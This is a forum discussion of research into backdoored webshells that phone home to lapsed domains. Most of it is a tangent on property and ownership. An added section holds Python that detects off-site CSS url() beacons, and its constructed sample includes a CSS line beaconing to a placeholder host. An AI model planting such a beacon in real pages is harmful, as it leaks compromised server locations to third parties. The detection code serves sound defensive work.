Hacker Remix

Backdooring Your Backdoors – Another $20 Domain, More Governments

431 points by mooreds 1 week ago | 73 comments

Lammy 1 week ago

To avoid my comment being entirely a terminology nitpick I will say this is very cool work that I would be too afraid of CFAA to ever attempt. Especially funny to see four parasites on one government domain. Do skiddies not excise other skiddies' backdoors when pwning systems so they can have them all to themselves?

> We then hooked that up to the AWS Route53 API, and just bought them en-masse. Honestly, it’s $20, and we’ve done worse with more.

> We’re incredibly grateful for the support of The Shadowserver Foundation, who have agreed yet again to save us from our own adventures and to take ownership of the domains implicated in this research and sinkhole them.

I wish we could collectively stop using the terms “buy” and “own” with regard to domains. Try “leased” or “rented”. If they could be bought then they wouldn't have been available again for this exercise.

judge2020 7 days ago

What would buying even mean in this sense? Even countries don't "own" their ccTLDs, but ICANN has made considerable efforts to outline policies that go "we really need to treat ccTLDs like the countries own them to avoid tensions over internet namespaces". That's why most gTLD rules don't apply to ccTLDs.

Countries "own" their ccTLD in the sense that they (or most) have the military prowess to defend their usage of their ccTLD if ICANN, or the servers at root-servers.net, were to stop resolving TLDs appropriately.

NewJazz 6 days ago

The root servers hold the real power, and IIRC over 50% are operated in the US, with many of them being operated by the US military and others by educational institutions.

I can only assume that the US has tolerated varied use of ccTLDs for the sole purpose of avoiding a competing alternate DNS root zone becoming more prominent.

preciousoo 6 days ago

I’m sure the NSA does their best to make sure the US doesn’t politically fuck that up

croemer 6 days ago

But root servers aren't a democracy, are they? If US root servers went bonkers, people would just use different root servers. Doesn't matter whether it's 50% or 90% that are in US if they can be ignored?

NewJazz 6 days ago

Yeah that's the point. If US acted up, and pressured other operators to follow suit, the root zone could split up. They don't want that to happen.

BobbyTables2 7 days ago

DNS is then a weapon of mass destruction

awwaiid 7 days ago

All property, physical and digital, is rented if you squint just right.

noduerme 7 days ago

I'm curious if this is a socialist lament about landlords or a libertarian complaint about governments.

lazyasciiart 7 days ago

Maybe it's an existential comment about the fleeting existence of life.

noduerme 2 days ago

That was actually the first way I squinted at it, and it doesn't have to be existential - the lack of ownership in the fourth dimension is stated well in most religions. But for some reason I doubt they meant it that way.

nightpool 6 days ago

I think it's just acknowledging the reality that property is a social construct, one that's created by the social contract.

mathieuh 6 days ago

Well, Rousseau himself would say property is theft, in not exactly those words.

From his Discourse on Inequality:

> The first man who, having enclosed a piece of land, thought of saying "this is mine" and found people simple enough to believe him, was the true founder of civil society. How many crimes, wars, murders; how much misery and horror the human race would have been spared if someone had pulled up the stakes and filled in the ditch and cried out to his fellow men: "beware of listening to this imposter. You are lost if you forget that the fruits of the earth belong to everyone and that the earth itself belongs to no one!"

short_sells_poo 6 days ago

Ultimately it comes down to force. The person with the pointiest sticks will likely be able to enforce their view about ownership over others.

Taken quite literally, property is armed theft from the commons I guess. Unfortunately, it's tricky to do otherwise in a loosely organized swarm of barely tribal actors, because any peaceful society based on shared ownership will be prone to exploitation by malicious actors. It's basically a very large prisoner's dilemma: the global optimum would be to abolish private property, but as long as there are (enough) people around to exploit the situation for their own benefit (and to the massive detriment of everyone else), we have to stick to a sub-optimal system where everyone is worse off than the optimum.

noduerme 2 days ago

How would the global optimum be to abolish private property when you just stated that without it we live in a swarm of barely tribal actors?

The alternative to large-scale force is small-scale theft. Which is not so small-scale when you multiply it across every village and province. Ever been in the middle of a full social breakdown? Or a riot? Anyone who's seen what actual anarchy looks like would beg for some sort of order, even if it has to be imposed by force. It requires a very sheltered understanding of how the world actually works to think that anything good will come from unleashing chaos.

nightpool 6 days ago

> Ultimately it comes down to force. The person with the pointiest sticks will likely be able to enforce their view about ownership over others.

This is a common but simplistic view that ignores e.g. concerns about popular legitimacy and support that often lead to the downfall of strongman regimes. Many people think they can enforce their views of ownership over others, but find that it's not quite that simple when they try to put it into practice. That's why I mentioned the social contract.

robertlagrant 6 days ago

> the global optimum would be to abolish private property

The Soviet Union had this I believe, at least with buildings, and it didn't necessarily work out optimally.

short_sells_poo 6 days ago

Certainly, and to be clear I'm not arguing for communism as a realistic system. It would be ideal in an ideal world without greed and selfishness. As long as those exist, we need to have a system that functions when the individual actors place their own interests far above the interests of others.

foobarbecue 6 days ago

I like to think of it biomimetically. Organisms and ecosystems have both competition and collaboration at every level of organization.

If I were to design a government from scratch I think it would actually be relatively easy to know what's best nationalized and what's best privatized. Nationalize the things that you do not want to be driven by the profit incentive because they need to be fair and accessible to all (mass transit, healthcare, utilities, communication networks, science), and privatize everything else (entertainment, retail, food, services).

throw5673985 6 days ago

> privatize everything else [including] food

yet:

> Nationalize the things that [...] need to be fair and accessible to all

Should food be accessible to all?

Or is food production privatized because market economies more accurately meet consumer demand?

short_sells_poo 6 days ago

Food is tricky. The food supply is one of the highest national security concerns IMO. Free market proponents love to go about saying that growing food should be left to countries and regions who do it well (due to climate and infrastructure), but if your country cannot grow enough food to supply its own citizens' basic calorie needs, you are literally living on borrowed time. If the food supply is cut off for any reason, things go down very-very rapidly and the government has days, if not hours, to sort things out before things descend into chaos.

At the same time, governments do not have a good track record of running the food/ags industry. I guess a system where the government heavily subsidizes it and incentivises domestic production, but lets farmers do their thing is probably as good as we can do?

foobarbecue 1 day ago

Good point. I learned this from Silo!

I say the government needs to ensure no one starves (food stamps, soup kitchens, etc. depending on the situation), and all food is safe to eat (it amazes me how well governments do this in most countries today), but otherwise production and distribution should be competitive.

noduerme 2 days ago

Countries that allow markets to control food prices have a far better track record of not starving, spiraling into hyperinflation, and losing wars than do countries which attempt to regulate food prices.

robertlagrant 6 days ago

> Free market proponents love to go about saying that growing food should be left to countries and regions who do it well (due to climate and infrastructure),

I think this is globalism rather than free market.

noduerme 2 days ago

I agreed with your first statement about competition and collaboration both being necessary. But if you extend that over time you see that those states in nature exist in a state of endless conflict, not in parallel. So in the realm of governing economies (democratically or otherwise), one of the most unfortunate but profitable outcomes of the human desire to oscillate between competition and collaboration is to be something like Argentina: Nationalize those things you want to be fair and accessible every 10 years and then privatize them again every other 10 years. This way, each new generation can lean capitalist or communist and make a killing by raiding whatever wealth was built by the previous generation in the name of fixing the system. Because after all, neither system is real. Both are just ways to paper over the fact that each new generation of young people are animals who kill their parents.

foobarbecue 1 day ago

8-0

foobarbecue 6 days ago

Wow, he sure can write! Proudhon literally wrote "property is theft" (see my other comments).

mathieuh 6 days ago

I'm aware, I was quoting Rousseau because the person I was replying to mentioned the social contract which was an area of particular concern for Rousseau. I would recommend reading Rousseau's Discourse on Inequality if you're interested, it's very accessible.

foobarbecue 6 days ago

Thanks, I will!

SkyBelow 6 days ago

Maybe a deeper truth that is harder to put into words but which feeds into both of them. Something captured in much higher dimensional concept space that, when forced into our 3D world (and our <whatever>D political discussion space), looks like a sphere in one projection and a cube in the other, but which is neither.

short_sells_poo 6 days ago

I tend to think it is neither of those, but meant very literally. For that reason I like it and I think it's an interesting subject.

What is ownership after all? The universe does not seem to have any form of ownership embedded in its fundamental laws. If ownership is a human construct, then it is only meaningful insofar as a group of humans agrees on it.

I can stroll up to the White House and declare that I own it, but I'll struggle to convince a sufficient number of other people that this is true. If I can't assert my ownership, then I don't really own it, do I? It doesn't matter whether it is just, or fair (again - purely human constructs), ownership only matters if it can be enforced.

Being a human construct, it is also by definition temporary. It is only valid as long as humans are around to enforce it, and humans are fleeting. Humanity might endure, but there's no reason to think we are going to be around for eternity.

So it looks like ownership is not only temporary, but it is also fickle. People routinely disagree on ownership and are willing to kill or be killed for asserting their claims.

It looks like neither the communists, nor the libertarians are in the right. Things will be owned by whoever has more pointy sticks :D

noduerme 2 days ago

It's not a human construct. If you have ever spent time around a cat, you can understand ownership completely without any legal constructs. What we as humans are somewhat proud of, or the definition of civilization, is that we spend most of our time trying to create systems to define boundaries and property rights without resorting to violence. Those systems can be fair and well-distributed or unfair and hereditary, or somewhere in-between; they inevitably hand over the violence to some arbiter or government (whether market-driven or communist dictatorship, it's the same in terms of a structure enforcing who gets what, even if the incentives and dynamics are skewed); but the point is that we code them into law so that any arbitrary cat can't just post up inside another cat's borders and terrorize the house.

The point of PROPERTY writ large isn't the piracy or acts of violence that people here make it out to be. Property doesn't arise from the law. Legal frameworks arise from the existence of property. And legal frameworks are an unadorned good in a world without them, because normal, domestic, and peaceful life does not exist where laws don't exist.

robertlagrant 6 days ago

> Things will be owned by whoever has more pointy sticks :D

That sounds like the feudal or socialist systems. Isn't one of the points of modern democracies that we have the pointy sticks for outside invaders, and a legal system that replaces the system of internal-facing pointy sticks with an economic system and a justice system?

krapp 6 days ago

No. All systems of law, regardless of their "democratic" nature, are based on the principle of the state's monopoly on violence, and that violence is always directed towards the citizenry.

No matter how civil your society may seem, resistance to the state will eventually mean you get shot or beaten with truncheons.

short_sells_poo 6 days ago

Exactly. Democratic and highly civilized countries still enforce property rights with pointy sticks. They maintain their claim on their territory against outside invaders with the army, and internally they enforce the laws of ownership using the police.

bell-cot 6 days ago

> I wish we could collectively stop...

That's a "feature" of human nature and English. People say "my car" and "my phone number" when those are leased. "My house" when they have a new zero-down mortgage. And all sorts of other conceptual contractions - with the messier reality assumed to be common knowledge. Or just irrelevant to the point at hand.

TacticalCoder 7 days ago

[dead]

fn-mote 7 days ago

I loved this write-up. Light-hearted. Conscious of the impact of any disclosure. Everything substantiated, but not taking themselves too seriously. Enjoyable read, and at the same time talking about a serious issue.

ipdashc 7 days ago

Thank you for putting it in words. I felt the same way, both about this and the write-up for their previous .mobi thing. Well explained with plenty of context, no buzzwords, light-hearted and cool (while not trying too hard to make themselves sound cool), and plenty of substance with no fluff. A lot of blog posts or security write-ups violate some of these; this is a breath of fresh air.

taspeotis 7 days ago

I also loved the appearance of WordArt, shame they did not do the rainbow one.

Thorrez 7 days ago

I wonder what would happen if they exploited these webshells' backdoors to delete the webshells...

abound 7 days ago

If you're the FBI (and maybe also have a court order), you can do this [1]. If you're a grey hat hacker in Russia, you can maybe do this [2]. If you're a random person in the US, you're likely exposing yourself to a lot of (CFAA) risk.

As the authors of this post note, they were careful to only receive + log traffic and not otherwise send interesting responses/engage with the webshells.

[1] https://www.malwarebytes.com/blog/news/2024/02/fbi-removes-m...

[2] https://www.zdnet.com/article/a-mysterious-grey-hat-is-patch...

croemer 6 days ago

I'm not sure I understand this correctly:

> This is a line of CSS, specifying that the ‘menu’ style should fetch a background image from the given URL. On loading the page, the web browser will attempt to fetch the specified .gif file from the w2img.com server.

> Note: Disclosing just the domain in referrers is a relatively recent browser change, and indeed attackers using older browsers were sending us full shell URLs.

In particular re "attackers using older browsers": haven't the (original) attackers taken over the _server_ that's serving the CSS and the browser belongs to unsuspecting _users_ of the pwned server? Isn't it wrong to say the attackers use the browsers then, as the browser is used by a victim?

Under which circumstances would _attackers_ be using a browser? I can't make sense of this.

TazeTSchnitzel 6 days ago

A webshell is a page (typically a .php file) uploaded to a site by an attacker after a compromise (e.g. an RCE), which is then used by an attacker through their browser to perform further actions on the compromised webserver. These premade webshell files however have been made by other attackers and come pre-compromised with a backdoor. In this case the CSS in the webshell makes the attacker's browser snitch the webshell's location to a domain controlled by the author of the webshell.
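
To make the mechanism in the comment above concrete from the defender's side, here is an added example (not code from the thread or from the original write-up). It does two things: scans an uploaded PHP/HTML file for CSS `url(...)` references that point off-site, which is exactly how a backdoored webshell phones home when the operator's browser renders it, and computes what the Referer header discloses for that cross-site image fetch under the older browser default (`no-referrer-when-downgrade`, full page URL) versus the current default (`strict-origin-when-cross-origin`, origin only), which is why older browsers leaked full shell URLs. The sample file and every hostname (`beacon.example.invalid`, `www.victim.example`) are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample of an uploaded PHP file with an embedded style block.
# Hostnames are placeholders, not taken from the write-up.
SAMPLE_WEBSHELL = """<?php /* shell code elided */ ?>
<style>
.menu { background-image: url('http://beacon.example.invalid/img/menu.gif'); }
.logo { background: url("/images/logo.png") no-repeat; }
body  { background-image: url(https://www.victim.example/bg.png); }
</style>
"""

# Matches url(...) with optional single or double quotes around the target.
_URL_RE = re.compile(r"""url\(\s*(['"]?)([^'")]+)\1\s*\)""", re.IGNORECASE)


def find_external_css_urls(content: str, site_host: str) -> list:
    """Return url(...) targets in CSS that point at a host other than site_host.

    Relative URLs and absolute URLs on the site's own host are not reported;
    anything else is a candidate beacon: the browser rendering the page will
    fetch it and attach a Referer header pointing back at the page.
    """
    external = []
    for _quote, target in _URL_RE.findall(content):
        target = target.strip()
        parts = urlsplit(target)
        if parts.netloc and parts.netloc.lower() != site_host.lower():
            external.append(target)
    return external


def referer_sent(page_url: str, request_url: str, policy: str) -> str:
    """Referer value a browser sends when page_url loads request_url under the
    given Referrer-Policy. Returns "" when no Referer is sent at all.

    Only the policies relevant to the discussion are modelled.
    """
    page, req = urlsplit(page_url), urlsplit(request_url)
    origin = f"{page.scheme}://{page.netloc}/"
    full = urlunsplit((page.scheme, page.netloc, page.path, page.query, ""))
    same_origin = (page.scheme, page.netloc) == (req.scheme, req.netloc)
    downgrade = page.scheme == "https" and req.scheme == "http"

    if policy == "no-referrer":
        return ""
    if policy == "unsafe-url":
        return full
    if policy == "origin":
        return origin
    if policy == "no-referrer-when-downgrade":       # older browser default
        return "" if downgrade else full
    if policy == "strict-origin-when-cross-origin":  # current browser default
        if downgrade:
            return ""
        return full if same_origin else origin
    raise ValueError(f"unsupported policy: {policy}")


if __name__ == "__main__":
    hits = find_external_css_urls(SAMPLE_WEBSHELL, "www.victim.example")
    print("external CSS resources:", hits)
    shell = "http://www.victim.example/uploads/shell.php"  # constructed
    for beacon in hits:
        for policy in ("no-referrer-when-downgrade", "strict-origin-when-cross-origin"):
            print(f"{policy:32} -> Referer: {referer_sent(shell, beacon, policy)!r}")
```

Running this on the constructed sample flags only the `beacon.example.invalid` image; under the older default the Referer carries the full shell path, under the current default just the origin, and an HTTPS page beaconing to a plain-HTTP host sends nothing at all. A file-upload or integrity-monitoring pipeline can run the first function over newly written `.php` files and alert on any off-site `url(...)`.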

croemer 6 days ago

Thanks, that makes sense, not sure how I could miss that.